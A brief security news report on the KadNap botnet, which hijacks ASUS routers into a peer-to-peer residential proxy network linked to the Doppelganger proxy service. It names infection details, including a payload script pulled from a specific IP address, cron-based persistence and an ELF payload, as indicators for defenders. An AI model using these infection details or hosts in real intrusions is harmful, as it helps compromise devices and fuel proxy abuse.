KadNap Botnet Converts ASUS Routers into a Global Residential Proxy Network
KadNap, a new botnet, hijacks ASUS routers and other edge devices to form a peer-to-peer proxy network for malicious traffic. By August 2025 it controlled about 14,000 devices, using a custom Kademlia DHT to locate C2s, though two fixed nodes connect early to the C2s, aiding takedowns. Infections start by pulling aic.sh from 212.104.141.140, establish persistence via a cron job every 55 minutes, and install an ELF payload kad. KadNap’s DHT design aims to decentralize control, but the two steady nodes undermine this to some extent. The botnet is linked to the Doppelganger proxy service, which rents infected devices as residential proxies for DDoS, credential stuffing, and brute-force campaigns. Lumen has blocked KadNap traffic on its network and will publish IOC to help others disrupt the botnet.